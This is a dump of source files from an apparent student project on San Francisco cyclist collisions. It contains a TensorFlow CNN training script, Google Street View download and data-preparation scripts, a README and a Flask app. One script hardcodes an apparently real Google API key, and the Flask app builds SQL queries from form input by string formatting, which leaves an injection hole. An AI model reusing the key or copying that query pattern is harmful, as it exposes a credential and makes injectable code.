bias_variable([2048])\n h_fc2 = tf.nn.relu(tf.matmul(cnn_out, W_fc2) + b_fc2)\n h_fc2 = tf.nn.dropout(h_fc2, keep_prob)\n\n W_fc3 = weight_variable([2048, 1024])\n b_fc3 = bias_variable([1024])\n h_fc3 = tf.nn.relu(tf.matmul(h_fc2, W_fc3) + b_fc3)\n h_fc3 = tf.nn.dropout(h_fc3, keep_prob)\n\n W_fc4 = weight_variable([1024, 512])\n b_fc4 = bias_variable([512])\n h_fc4 = tf.nn.relu(tf.matmul(h_fc3, W_fc4) + b_fc4)\n h_fc4 = tf.nn.dropout(h_fc4, keep_prob)\n\n W_fc5 = weight_variable([512, 256])\n b_fc5 = bias_variable([256])\n h_fc5 = tf.nn.relu(tf.matmul(h_fc4, W_fc5) + b_fc5)\n h_fc5 = tf.nn.dropout(h_fc5, keep_prob)\n\n W_fc6 = weight_variable([256, 128])\n b_fc6 = bias_variable([128])\n h_fc6 = tf.nn.relu(tf.matmul(h_fc5, W_fc6) + b_fc6)\n h_fc6 = tf.nn.dropout(h_fc6, keep_prob)\n\n\n W_fc_out = weight_variable([128, 1])\n b_fc_out = bias_variable([1])\n y_pred = tf.nn.relu(tf.matmul(h_fc6, W_fc_out) + b_fc_out)\n\n print(\"y_pred:\",y_pred.shape)\n\n loss = tf.reduce_mean(tf.square(y_pred - y_))\n\n train_step = tf.train.AdamOptimizer(LR).minimize(loss)\n\n\n x_img_train = np.array(x_img_train)\n print(x_img_train.shape)\n\n\n saver = tf.train.Saver()\n sess = tf.Session() \n #sess.run(tf.initialize_all_variables()) \n sess.run(tf.global_variables_initializer()) \n\n if train_type == \"train\":\n results_train = []\n results_test = []\n for i in range(epochs): \n print(\"epoch:\",i)\n test_losses=[]\n train_losses = []\n\n for j in range(TRAIN_EXAMPLES//BATCH_SIZE):\n _,train_loss = sess.run(fetches = (train_step,loss),\n feed_dict = {x_img:x_img_train[j*BATCH_SIZE:(j+1)*BATCH_SIZE], y_:y_train[j*BATCH_SIZE:(j+1)*BATCH_SIZE], keep_prob:0.2})\n train_losses.append(train_loss)\n print(\"step %d, train_loss %g\" %(i, sum(train_losses) / len(train_losses)))\n results_train.append(sum(train_losses) / 
len(train_losses))\n for j in range(TEST_EXAMPLES//BATCH_SIZE):\n\n test_loss = sess.run(fetches = (loss), feed_dict = {x_img:x_img_test[j*BATCH_SIZE:(j+1)*BATCH_SIZE], y_:y_test[j*BATCH_SIZE:(j+1)*BATCH_SIZE],\n keep_prob:1.0}) \n test_losses.append(test_loss)\n\n print(\"step %d, test_loss %g\" %(i, sum(test_losses) / len(test_losses)))\n results_test.append(sum(test_losses) / len(test_losses))\n \n save_path_name = \"save_model_collision/CNN.ckpt\"\n saver.save(sess, save_path_name)\n\n x_img_train,y1,y2,y3,name = load_dataset(\"/home/DVA_Group_Project-master/Data/collision_downloads\",\"/home/DVA_Group_Project-master/Data/model_data_segment_full_20191109.csv\", \"sys.argv[1]\")\n f = open(\"result.txt\",'w')\n BATCH_SIZE = 1\n for j in range(x_img_train.shape[0]//BATCH_SIZE):\n pred = sess.run(fetches = (y_pred), feed_dict = {x_img:x_img_train[j*BATCH_SIZE:(j+1)*BATCH_SIZE],\n keep_prob:1.0}) \n f.write(name[j]+\": \")\n f.write(str(pred[0,0])+\"\\t\")\n f.write(\"\\n\")\n f.close()\n\n else:\n model_path = \"save_model_collision/CNN.ckpt\"\n # Restore model weights from previously saved model\n load_path = saver.restore(sess, model_path)\n print(\"Model restored from file: %s\" % model_path)\n\n f = open(\"result.txt\",'w')\n BATCH_SIZE = 1\n for j in range(x_img_train.shape[0]//BATCH_SIZE):\n pred = sess.run(fetches = (y_pred), feed_dict = {x_img:x_img_train[j*BATCH_SIZE:(j+1)*BATCH_SIZE],\n keep_prob:1.0}) \n f.write(name[j]+\": \")\n f.write(str(pred[0,0])+\"\\t\")\n f.write(\"\\n\")\n f.close()\n\n return \n\n\n\n\n#######################################################################\n\nif __name__ == '__main__':\n image_path = \"/home/DVA_Group_Project-master/Data/collision_downloads\"\n feats_path = \"/DVA_Group_Project-master/Data/model_data_segment_full_20191109.csv\"\n if sys.argv[1] != \"train\":\n image_path = \"/home/DVA_Group_Project-master/Data/NewData_1\"\n x_img_train, x_img_test, y_train, y_test, filename = load_dataset(image_path,feats_path, sys.argv[1])\n model = train(BATCH_SIZE, EPOCHS,x_img_train, x_img_test, y_train, y_test,filename, sys.argv[1])\n" }, { "alpha_fraction": 0.49201276898384094, "alphanum_fraction": 0.5463258624076843, "avg_line_length": 16.38888931274414, "blob_id": "fccd5790f514cf96e546f94df1b0efa71722310c", "content_id": "2fdc011351ef8aec6f633296158c690f65ea2621", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 39, "num_lines": 18, "path": "/Data/collision_downloads/rename.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 6 20:52:55 2019\n\n@author: tingli\n\"\"\"\n\nimport os\nimport csv\n\nwith open('names.csv') as f:\n lines = csv.reader(f)\n for line in lines:\n try:\n os.rename(line[0],line[1] )\n except:\n print(line[0],line[1])\n" }, { "alpha_fraction": 0.5853314399719238, "alphanum_fraction": 0.66995769739151, "avg_line_length": 21.171875, "blob_id": "f8e2f30db4b0104eb97ff7eb33982c78e5611059", "content_id": "7890795d7b1bb51d2e11f56c107392e9647930f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1418, "license_type": "no_license", "max_line_length": 127, "num_lines": 64, "path": "/team64final/CODE/Scripts/streetViewApi.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport 
google_streetview.api\n\n\ncsvExport = pd.read_csv(\"./DVA_Group_Project/Data/TransBase/geo_st_intrsctn.csv\", sep = \",\",usecols = [\"latitude\",\"longitude\"])\n#print(csvExport)\nparams=[]\ncount=0\nfor index, rows in csvExport.iterrows(): \n latitude =rows.latitude\n longitude= rows.longitude\n input_array= {\n\t'size': '600x300', \n\t'location': ''+str(latitude)+','+str(longitude)+'',\n\t'heading': '151.78',\n\t'pitch': '-0.76',\n\t'key': 'AIzaSyB0NpeNQgVuTxfHdkxw2lhl7WCvpWN6GXc'\n}\n count+=1\n print(count)\n print(latitude,longitude)\n params.append(input_array)\nprint(count)\nresults = google_streetview.api.results(params)\n# Preview results\n#results.preview()\n\n# Download images to directory 'downloads'\nresults.download_links('downloads')\n\n# Save links\nresults.save_links('links.txt')\n\n# Save metadata\nresults.save_metadata('metadata.json')\n\n#print(params)\n\n#latitude=37.70941911820\n#longitude=-122.38250569300\n#input_array= {\n#\t'size': '600x300', \n#\t'location': ''+str(latitude)+','+str(longitude)+'',\n#\t'heading': '151.78',\n#\t'pitch': '-0.76',\n#\t'key': 'AIzaSyB0NpeNQgVuTxfHdkxw2lhl7WCvpWN6GXc'\n#}\n#params.append(input_array)\n\n\n\n#params = [{\n#\t'size': '600x300', # max 640x640 pixels\n#\t'location': '37.70941911820,-122.38250569300',\n# ##'46.414382,10.013988',\n#\t'heading': '151.78',\n#\t'pitch': '-0.76',\n#\t'key': 'AIzaSyB0NpeNQgVuTxfHdkxw2lhl7WCvpWN6GXc'\n#}]\n#\n#results = google_streetview.api.results(params)\n#\n## Download images to directory 'downloads'\n#results.download_links('downloads')" }, { "alpha_fraction": 0.5385600924491882, "alphanum_fraction": 0.5757110118865967, "avg_line_length": 14.658634185791016, "blob_id": "b64dab3f2254c57e81b058e1dd2e7e6b92ba5a89", "content_id": "6dbe061acb23b5f52c4f92b51840ca92fe32d000", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3903, "license_type": "no_license", "max_line_length": 122, "num_lines": 249, "path": "/team64final/CODE/Scripts/model_data_segment_full_20191109.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# ### This notebook shapes collision data to street segment level and compute all model features needed to the same level.\n\n# 1. Set-up\n\n# In[68]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom pandas import read_sql\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n# In[69]:\n\n\npd.set_option('display.max_colwidth', -1)\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\n\n# 2. load data \n\n# In[106]:\n\n\n# main table with case-level collision record\ndf = pd.read_csv('transbase_collision.csv')\n\n# mapping table with traffic volume for each street segment\n# df_2 = pd.read_csv('st_sgmt_trnsprtn.csv')\n\n# strees_full\ndf_2 = pd.read_csv('streets_full.csv')\n\n\n# In[71]:\n\n\n# preview main table\n\ndf.head()\n\n\n# In[74]:\n\n\n# preview main table\n\ndf.describe()\n\n\n# In[75]:\n\n\n# select the cols we need\n\ndf_select = df[['case_id_pkey','cnn_sgmt_fkey', 'collision_severity']]\n\n\n# In[76]:\n\n\n# preview selected cols\n\ndf_select.head()\n\n\n# 3. 
Transform variables\n\n# In[ ]:\n\n\n# 3.1 collision_severity\n\n\n# In[77]:\n\n\ndf_select['collision_severity'].isnull().sum()\n\n\n# In[21]:\n\n\ndf_select['collision_severity'].value_counts()\n\n\n# In[78]:\n\n\n# mapping rule\n\n# Injury (Other Visible) 4\n# Injury (Complaint of Pain) 3\n# Injury (Severe) 2 \n# Fatal 1\n\n\n# In[79]:\n\n\n# convert!\n\ndf_select['cs_injury_4'] = np.where(df_select['collision_severity'] == 'Injury (Other Visible)', 1, 0)\ndf_select['cs_injury_3'] = np.where(df_select['collision_severity'] == 'Injury (Complaint of Pain)', 1, 0)\ndf_select['cs_injury_2'] = np.where(df_select['collision_severity'] == 'Injury (Severe)', 1, 0)\ndf_select['cs_injury_1'] = np.where(df_select['collision_severity'] == 'Fatal', 1, 0)\n\n\n# In[91]:\n\n\n# roll up to segment key level\n\ndf_select_sgmt_level = df_select.groupby('cnn_sgmt_fkey').agg({'case_id_pkey':'size',\n                                                               'cs_injury_4':'sum',\n                                                               'cs_injury_3':'sum',\n                                                               'cs_injury_2':'sum',\n                                                               'cs_injury_1':'sum' \n                                                               }).reset_index()\n\n\n# In[93]:\n\n\n# change column names\n\ndf_select_sgmt_level.rename(columns={'case_id_pkey': 'num_collisions', \n                                     'cs_injury_4': 'num_cases_injury_other_visible',\n                                     'cs_injury_3': 'num_cases_complaint_of_pain',\n                                     'cs_injury_2': 'num_cases_severe',\n                                     'cs_injury_1': 'num_cases_fatal'\n                                     }, inplace=True)\n\n\n# In[97]:\n\n\ndf_select_sgmt_level.head()\n\n\n# In[98]:\n\n\n# no nulls\n\ndf_select_sgmt_level.isnull().sum()\n\n\n# 4. Merge df_select_sgmt_level table and the streets_full table\n\n# In[99]:\n\n\n# preview main table (filtered version)\n\ndf_select.head()\n\n\n# In[107]:\n\n\ndf_2.head()\n\n\n# In[108]:\n\n\n# check nulls for each column\n\ndf_2.isnull().sum()\n\n\n# In[86]:\n\n\n# daily_ride_qrt has 428 nulls\n# need to remove from y metric calculation because denominator cannot be null\n\n\n# In[109]:\n\n\ndf_2_select = df_2.copy()\n\n\n# In[115]:\n\n\n# merge using segment key\n\ndf_3 = df_select_sgmt_level.merge(df_2, left_on = 'cnn_sgmt_fkey', right_on = 'cnn_sgmt_pkey', how = 'inner')\n\n\n# In[116]:\n\n\ndf_3.head()\n\n\n# In[117]:\n\n\ndf_3.isnull().sum()\n\n\n# 5. compute y\n\n# In[119]:\n\n\n# Number of collision/daily_ride_qrt\n\ndf_3_notnull = df_3[df_3['daily_ride_qrt'].isnull() == False]\n\ndf_3_notnull['y'] = df_3_notnull['num_collisions'] * 1. / df_3_notnull['daily_ride_qrt']\n\n\n# In[120]:\n\n\ndf_3_notnull.head(20)\n\n\n# In[121]:\n\n\ndf_3_notnull.isnull().sum()\n\n\n# In[124]:\n\n\ndf_3_notnull['y'].describe()\n\n\n# In[126]:\n\n\ndf_3_notnull.to_csv('model_data_segment_full_20191109.csv', index = False)\n\n\n# In[ ]:\n\n\n\n\n" }, { "alpha_fraction": 0.6626213788986206, "alphanum_fraction": 0.6723300814628601, "avg_line_length": 33.29166793823242, "blob_id": "767258fb48053bea3b0f11fdc993cf20e1843a60", "content_id": "1244c9cb2b41e8f2b88c9e67346c03dbe867a168", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 824, "license_type": "no_license", "max_line_length": 87, "num_lines": 24, "path": "/README.md", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "# Group Project\n\n![SF_Map](sfmap.jpeg)\n\n1. Data\n <br/> &nbsp; A. download - GSV pictures\n <br/>&nbsp; B. data for models\n <br/> &nbsp; C. collision_download - GSV pictures for collision\n2. Database - original collision data\n3. GSV_API - Google street view code\n4. Image_detect - CNN and object detection\n5. Metric LR - References for our model\n6. Script - codes\n7. 
Viz - frontend\n Use python to set up local host\n <br/> &nbsp; A. static - store static data files\n <br/> &nbsp;&nbsp;&nbsp; css - css style\n <br/> &nbsp;&nbsp;&nbsp; res - all csv & GeoJSON files\n <br/> &nbsp; B. lib - library files\n <br/> &nbsp; index.html - Final html file\n <br/> &nbsp;readme.txt - setup draft for TA\n8. Archive - archived files\n\nNote: Please submit a **PULL REQUEST** when significant changes are to be made. Thanks!\n\n" }, { "alpha_fraction": 0.5927756428718567, "alphanum_fraction": 0.595817506313324, "avg_line_length": 28.233333587646484, "blob_id": "e4aa413b742511f734ee074452a3214e58dd6a10", "content_id": "40329f879df91a2f02a78350786189a30013a55e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2630, "license_type": "no_license", "max_line_length": 75, "num_lines": 90, "path": "/Archive/app.py", "repo_name": "pokeritney/Safe_Street_Cyclist", "src_encoding": "UTF-8", "text": "from flask import Flask,render_template,request,g, url_for\nimport pandas as pd\nimport sqlite3\nimport os\n\nDATABASE = \"./collision.db\"\n\n#Create app\napp = Flask(__name__)\n\n#__file__ refers to current module\nROOT = os.path.dirname(os.path.abspath(__file__))\nSTATIC = os.path.join(ROOT, 'static')\nRES = os.path.join(STATIC, 'res')\n\n#connect to database\ndef get_db():\n db = g._database = sqlite3.connect(DATABASE)\n return db\n\[email protected]_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close()\n\[email protected](\"/\")\ndef index():\n #index.html MUST be inside ./templates\n return render_template(\"index.html\")\n\n#filter function\ndef multiple_filter(user_input):\n '''input: user_input - a list of strings: user's selection\n e.g., user_input = [day, weather] and day = Wednesday, weather = Cloudy\n return: requested SQL statement\n Currently the code ONLY TEST TWO COLUMNS'''\n \n col_name = [\"day_of_week\", \"weather_1\"]\n #check if users selected anything\n var = list(set(user_input))\n \n #if not, return all collision cases\n if len(var) == 1 and var[0] == \"All\":\n query = \"SELECT * FROM collision\"\n #if yes, return selected ones\n else:\n query = 'SELECT * FROM collision WHERE '\n count = 0\n for i, c in enumerate(user_input):\n if c != \"All\":\n count += 1\n v = col_name[i]\n if count > 1:\n c_filter = ' AND {} = \"{}\"'.format(v, c)\n query += c_filter\n else:\n c_filter = '{} = \"{}\"'.format(v, c)\n query += c_filter\n return query\n\n\n#query from user input\[email protected]('/query_user', methods=['GET', 'POST'])\ndef query_user():\n '''Proposed logic:\n request function get selected category from users' selection \n and save it as a string into day variable, it then \n gets into multi_filter to produce a sql query. \n Likewise, all other variables are feed into the sql query \n to produce filtered csv.\n csv is then output to current path to be used by html file to\n show collision data detail'''\n \n day = request.form['day']\n weather = request.form['weather']\n a = [day, weather]\n print(a)\n db = get_db()\n query = multiple_filter(a)\n filtered_df = pd.read_sql_query(query, db)\n \n csv_path = os.path.join(RES, 'output.csv')\n print(\"csv_path - \",csv_path)\n filtered_df.to_csv(csv_path,index=False)\n \n return render_template(\"index.html\")\n \nif __name__ == \"__main__\":\n app.run()" } ]
12
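The filter scripts in this repo build SQL WHERE clauses by string concatenation. As a safer, equivalent pattern, here is a minimal parameterized-query sketch (assuming the same `collision` table, the `collision.db` path from app.py, and the column names used above; `build_filter_query` is an illustrative helper, not part of the repo):

```python
import sqlite3
import pandas as pd

def build_filter_query(selections):
    """Build a parameterized WHERE clause from {column: value} pairs,
    skipping any column the user left as "All"."""
    clauses, params = [], []
    for col, val in selections.items():
        if val != "All":
            clauses.append(col + " = ?")  # placeholder instead of an inlined value
            params.append(val)
    sql = "SELECT * FROM collision"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return sql, params

conn = sqlite3.connect("collision.db")
sql, params = build_filter_query({"day_of_week": "Sunday", "weather_1": "All"})
df = pd.read_sql_query(sql, conn, params=params)
```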
Harrison-Brown/Qolygen
https://github.com/Harrison-Brown/Qolygen
a912567a33aa6988c3a6e1d572b29c31918c429c
61cb35c183fa3759af4e055d920e123d356c9595
c63de2a85e465c4d407e8bf0a16e8083b11d4907
refs/heads/main
2023-04-15T22:38:10.793548
2021-04-28T20:23:01
2021-04-28T20:23:01
362,596,168
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7992125749588013, "alphanum_fraction": 0.7992125749588013, "avg_line_length": 126, "blob_id": "22f05b4f7df145d21eea89497b05596d324d76a0", "content_id": "be5250d13434ec81bc79902d33308b727aa41b49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 254, "license_type": "no_license", "max_line_length": 243, "num_lines": 2, "path": "/README.md", "repo_name": "Harrison-Brown/Qolygen", "src_encoding": "UTF-8", "text": "# Qolygen\nSimple script that generates a polynomial that passes through points. Instead of using decimals, it uses fractional coefficients. Edit the points in `main()` within `qolygen.py`, and it'll output the polynomial that passes through said points.\n" }, { "alpha_fraction": 0.4339887499809265, "alphanum_fraction": 0.4606741666793823, "avg_line_length": 23.428571701049805, "blob_id": "c26b7b67697e39280da1a6ca095e3431a7425d9c", "content_id": "47597893413131dd6011848f3679a5dd8c2caf50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 712, "license_type": "no_license", "max_line_length": 49, "num_lines": 28, "path": "/Qolygen.py", "repo_name": "Harrison-Brown/Qolygen", "src_encoding": "UTF-8", "text": "from Qolynomial import *\r\n\r\ndef Qolygen(points):\r\n result = Qolynomial(0)\r\n for i in range(len(points)):\r\n point = points.pop(i)\r\n q = Qolynomial(1)\r\n d = 1\r\n for p in points:\r\n q *= Qolynomial(-p[0], 1)\r\n d *= (point[0] - p[0])\r\n q *= Qolynomial(Q(point[1], d))\r\n result += q\r\n points.insert(i, point)\r\n return result\r\n\r\ndef main():\r\n points = [(2, 3), (10, 3), (-2, 1), (7, 6)]\r\n print('Points given:')\r\n print(points)\r\n q = Qolygen(points)\r\n print('Function found:')\r\n print('f(x) = ' + str(q))\r\n for p in points:\r\n print('f({}) = {}'.format(p[0], q(p[0])))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n" }, { "alpha_fraction": 0.42971333861351013, "alphanum_fraction": 0.43825799226760864, "avg_line_length": 26.793651580810547, "blob_id": "3f4496168653929fe149dfa635508cbe11214ac3", "content_id": "5ffcab8085d3483adb1d8f903580c17b70c6a909", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3628, "license_type": "no_license", "max_line_length": 74, "num_lines": 126, "path": "/Qolynomial.py", "repo_name": "Harrison-Brown/Qolygen", "src_encoding": "UTF-8", "text": "class Q:\r\n def __init__(self, n, d = 1):\r\n self.n = n\r\n if n == 0:\r\n d = 1\r\n self.d = d\r\n self.reduce()\r\n\r\n def __add__(self, other):\r\n n = (self.n * other.d) + (self.d * other.n)\r\n d = self.d * other.d\r\n return Q(n, d)\r\n\r\n def __sub__(self, other):\r\n other.n = -other.n\r\n return self + other\r\n\r\n def __mul__(self, other):\r\n n = self.n * other.n\r\n d = self.d * other.d\r\n return Q(n, d)\r\n\r\n def __pow__(self, power):\r\n return Q(self.n**power, self.d**power)\r\n\r\n def __truediv__(self, other):\r\n other.n, other.d = other.d, other.n\r\n return self * other\r\n\r\n def reduce(self):\r\n if self.d < 0:\r\n self.d *= -1\r\n self.n *= -1\r\n a = max(self.n, self.d)\r\n b = min(self.n, self.d)\r\n while b:\r\n a, b = b, a % b\r\n a = abs(a)\r\n self.n = self.n // a\r\n self.d = self.d // a\r\n\r\n def __repr__(self):\r\n if self.d == 1:\r\n return 'Q({})'.format(self.n)\r\n else:\r\n return 'Q({}, {})'.format(self.n, self.d)\r\n\r\n def __str__(self):\r\n if self.d == 1:\r\n return '{}'.format(self.n)\r\n else:\r\n return '{}/{}'.format(self.n, 
self.d)\r\n\r\n def __eq__(self, other):\r\n if self.n == other.n and self.d == other.d:\r\n return True\r\n else:\r\n return False\r\n\r\nclass Qolynomial():\r\n def __init__(self, *coeffs):\r\n if coeffs == ():\r\n coeffs = [0]\r\n self.coeffs = list(coeffs)\r\n for i in range(len(self.coeffs)):\r\n if type(self.coeffs[i]) is int:\r\n self.coeffs[i] = Q(self.coeffs[i])\r\n self.unpad()\r\n self.degree = len(self.coeffs) - 1\r\n\r\n def unpad(self):\r\n if self.coeffs[-1] == Q(0) and len(self.coeffs) > 1:\r\n self.coeffs.pop(-1)\r\n self.unpad()\r\n\r\n\r\n def __call__(self, x):\r\n if type(x) is int:\r\n x = Q(x)\r\n l = self.coeffs.copy()\r\n while len(l) > 1:\r\n a = l.pop(-1)\r\n l[-1] += a * x\r\n return l[0]\r\n\r\n def __repr__(self):\r\n return \"Qolynomial{}\".format(tuple(self.coeffs))\r\n\r\n def __str__(self):\r\n if self.degree == 0:\r\n return str(self.coeffs[0])\r\n elif self.degree == 1:\r\n return str(self.coeffs[0]) + ' + ' + str(self.coeffs[1]) + 'x'\r\n else:\r\n s = str(self.coeffs[0]) + ' + ' + str(self.coeffs[1]) + 'x'\r\n for i in range(2, self.degree + 1):\r\n s += ' + ' + str(self.coeffs[i]) + 'x^' + str(i)\r\n return s\r\n\r\n def __add__(self, other):\r\n if self.degree < other.degree:\r\n larger = other.coeffs.copy()\r\n smaller = self.coeffs.copy()\r\n else:\r\n larger = self.coeffs.copy()\r\n smaller = other.coeffs.copy()\r\n for i in range(len(smaller)):\r\n larger[i] += smaller[i]\r\n return Qolynomial(*larger)\r\n\r\n def __sub__(self, other):\r\n l = [-1 * x for x in other.coeffs]\r\n return self + Qolynomial(*l)\r\n\r\n def __mul__(self, other):\r\n l = [Q(0) for x in range(self.degree + other.degree + 1)]\r\n for i in range(len(self.coeffs)):\r\n for j in range(len(other.coeffs)):\r\n l[i + j] += self.coeffs[i] * other.coeffs[j]\r\n return Qolynomial(*l)\r\n\r\n def __pow__(self, power):\r\n q = Qolynomial(*self.coeffs.copy())\r\n for i in range(power -1):\r\n q *= Qolynomial(*self.coeffs.copy())\r\n return q\r\n" } ]
3
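The Qolynomial module above hand-rolls exact rational arithmetic with its Q class. For comparison, the same Lagrange interpolation with exact fractional coefficients can be sketched with the standard library's `fractions.Fraction` (a minimal illustration, not part of the repo; `lagrange_coeffs` is a hypothetical helper name):

```python
from fractions import Fraction

def lagrange_coeffs(points):
    """Return coefficients (constant term first, matching Qolynomial's
    convention) of the interpolating polynomial through (x, y) points."""
    n = len(points)
    coeffs = [Fraction(0)] * n
    for i, (xi, yi) in enumerate(points):
        basis = [Fraction(1)]   # i-th Lagrange basis numerator, as coefficients
        denom = Fraction(1)
        for j, (xj, _) in enumerate(points):
            if j == i:
                continue
            basis = [Fraction(0)] + basis      # multiply by x (degree shift)...
            for k in range(len(basis) - 1):
                basis[k] -= xj * basis[k + 1]  # ...then subtract xj * basis
            denom *= (xi - xj)
        for k in range(n):
            coeffs[k] += yi * basis[k] / denom
    return coeffs

# First three sample points from Qolygen.main(): f(x) = 13/6 + x/2 - x^2/24
print(lagrange_coeffs([(2, 3), (10, 3), (-2, 1)]))
```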
afcarl/mappings-autogeneration
https://github.com/afcarl/mappings-autogeneration
633bca3aab228c77a3c974adfd266faa498bd014
c05e4fa1c6f02bc2341e1dd9ad1d5d4febc86bbf
b03a7647d9a1a4adca06d4656ac9f69f97607ac8
refs/heads/master
2020-03-17T23:55:33.601096
2016-08-09T03:54:49
2016-08-09T03:54:49
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7064017653465271, "alphanum_fraction": 0.7461368441581726, "avg_line_length": 49.33333206176758, "blob_id": "efa75bd22309e16d9c307e101d795d077d3b51c2", "content_id": "d980e365fa19c569ae952fc33b63fbf61875778b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 453, "license_type": "permissive", "max_line_length": 111, "num_lines": 9, "path": "/Data/README.md", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "# directory to store the data\n\n### Data Source\n\n- ***Existing Mapping***: http://mappings.dbpedia.org/server/mappings/en/pages/rdf/all \n- ***Article Template Links***: http://downloads.dbpedia.org/2015-10/core-i18n/en/article_templates_en.ttl.bz2 \n- ***Interlanguage Links***: http://downloads.dbpedia.org/2015-10/core-i18n/en/interlanguage_links_en.ttl.bz2\n\nThe above links are datasets in English, replace \"en\" to obtain datasets for other languages.\n" }, { "alpha_fraction": 0.6655573844909668, "alphanum_fraction": 0.6747088432312012, "avg_line_length": 31.707483291625977, "blob_id": "1280913c2440cbf2befcda036caa0931f3c26b5b", "content_id": "21bef5a2ed8a795103807ba9bc5ed3cf91fa5825", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4808, "license_type": "permissive", "max_line_length": 120, "num_lines": 147, "path": "/Code/factorization.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import numpy as np\nimport scipy.sparse as spsp\nimport pandas as pd\nfrom rescal import rescal_als\nimport config\nfrom optparse import OptionParser\nfrom utils import time_utils, pkl_utils\nimport os\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n_log = logging.getLogger('RESCAL')\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"en\", type=\"string\", dest=\"lang\", help=\"specify the language\")\n\tparser.add_option(\"-p\", \"--parse\", default=False, action=\"store_true\", dest=\"parse\", help=\"enable the parsing module\")\n\tparser.add_option(\"-t\", \"--train\", default=False, action=\"store_true\", dest=\"train\", help=\"enable the training module\")\n\tparser.add_option(\"-r\", \"--rank\", default=10, type=\"int\", dest=\"r\", help=\"specify the rank\")\n\tparser.add_option(\"-i\", \"--iteration\", default=10, type=\"int\", dest=\"i\", help=\"specify the number of iteration\")\n\tparser.add_option(\"--fin\", type=\"string\", dest=\"fin\", help=\"the path of input file\")\n\tparser.add_option(\"--fout\", type=\"string\", dest=\"fout\", help=\"the path of output file\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef parse(lang=\"en\"):\n\t_log.info(\"starting parsing\")\n\tinfile = open(config.INSTANCE_TYPES[lang])\n\trdf_type = \"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\"\n\ttype_entries = []\n\tentitySet = set()\n\ttypeSet = set()\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tinstance = row[0][1:-1]\n\t\tontology = row[2][1:-1]\n\t\ttype_entries.append((instance, ontology))\n\t\tentitySet.add(ontology)\n\t\ttypeSet.add(ontology)\n\ttypeDict = {y:x for x, y in enumerate(typeSet)}\n\tinfile.close()\n\n\tcnt_type = len(entitySet)\n\t_log.info(\"%d types\" % cnt_type)\n\n\tinfile = open(config.OBJECTS[lang])\n\trelationDict = {}\n\tinstanceSet = set()\n\tfor line in infile.readlines():\n\t\tif line[0] != 
\"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tsubject = row[0][1:-1]\n\t\tpredicate = row[1][1:-1]\n\t\ttarget = row[2][1:-1]\n\t\tentitySet.add(subject)\n\t\tentitySet.add(target)\n\t\tinstanceSet.add(subject)\n\t\tinstanceSet.add(target)\n\t\tif predicate in relationDict:\n\t\t\trelationDict[predicate].append((subject, target))\n\t\telse:\n\t\t\trelationDict[predicate] = [(subject, target)]\n\tinstanceDict = {y:x for x, y in enumerate(instanceSet)}\n\tentityDict = {y:x for x, y in enumerate(entitySet)}\n\tinfile.close()\n\n\tcnt_ins = len(instanceSet)\n\tN = len(entitySet)\n\t_log.info(\"%d instanes\" % cnt_ins)\n\t_log.info(\"%d entites\" % N)\n\t\n\ttensor = []\n\tpredicateDict = {}\n\tcnt = 0\n\tfor predicate in relationDict:\n\t\tentries = relationDict[predicate]\n\t\trows = [entityDict[entry[0]] for entry in entries]\n\t\tcols = [entityDict[entry[1]] for entry in entries]\n\t\tdata = [1 for entry in entries]\n\t\tmat = spsp.csr_matrix((data, (rows, cols)), (N, N))\n\t\ttensor.append(mat)\n\t\tpredicateDict[predicate] = cnt\n\t\tcnt += 1\n\ttype_entries = [entry for entry in type_entries if entry[0] in instanceSet]\n\trows = [entityDict[entry[0]] for entry in type_entries]\n\tcols = [entityDict[entry[1]] for entry in type_entries]\n\tdata = [1 for entry in type_entries]\n\tmat = spsp.csr_matrix((data, (rows, cols)), (N, N))\n\ttensor.append(mat)\n\tpredicateDict[rdf_type] = cnt\n\t_log.info(\"%d relations\" % (cnt+1))\n\tpkl_utils._save(config.TENSOR[lang], tensor)\n\tpkl_utils._save(config.ENTITY[lang], entityDict)\n\tpkl_utils._save(config.PREDICATE[lang], predicateDict)\n\tpkl_utils._save(config.INSTANCE[lang], instanceDict)\n\tpkl_utils._save(config.TYPE[lang], typeDict)\n\tpkl_utils._save(config.TYPE_MATRIX[lang], (rows, 